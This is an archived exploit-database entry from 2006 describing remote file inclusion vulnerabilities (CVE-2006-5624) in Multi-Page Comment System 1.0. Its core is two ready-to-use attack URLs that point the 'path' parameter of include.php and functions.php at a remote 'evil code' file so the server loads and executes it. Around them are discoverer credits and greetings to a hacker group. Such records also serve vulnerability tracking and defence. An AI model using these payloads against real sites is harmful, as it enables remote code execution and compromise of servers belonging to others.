MPCS <= 1.0 path Remote File Include Vulnerabilities

2006-10-26T00:00:00
ID EDB-ID:2653
Type exploitdb
Reporter v1per-haCker
Modified 2006-10-26T00:00:00

Description

MPCS <= 1.0 (path) Remote File Include Vulnerabilities. CVE-2006-5624. Webapps exploit for php platform

                                        
                                            #==================================================================
#  Multi-Page Comment System (RFI)
#==================================================================
# Info:-
#
# Scripts:  Multi-Page Comment System (MPCS)
# Home: http://tpvgames.co.uk/web/mpcs/
# Download: http://myweb.tiscali.co.uk/williamshost/mpcs.zip
# Version : 1.0.0
# Dork & vuln : download scripts and think :)
#
#==================================================================
#Exploit :
#
#http://localhost/path/include.php?path=http://EvElCoDe.txt?
#http://localhost/path/functions.php?path=http://EvElCoDe.txt?
#
#==================================================================
#Discoverd By : v1per-haCker
#
#Conatact : v1per-hacker[at]hotmail.com
#XP10_hackEr Team
#Greetz to : abu_shahad | RooT-shilL | hitler_jeddah | BooB11 | FaTaL |
#               ThE-WoLf-KsA | mohandko | fooooz | maVen | fucker_net |
#           metoovet | MooB | Dr.7zN | ToOoFA | Cold Zero
#And all members in XP10_hackEr Team
#Thanx to str0ke :)
#WWW.XP10.COM
#
#==================================================================

# milw0rm.com [2006-10-26]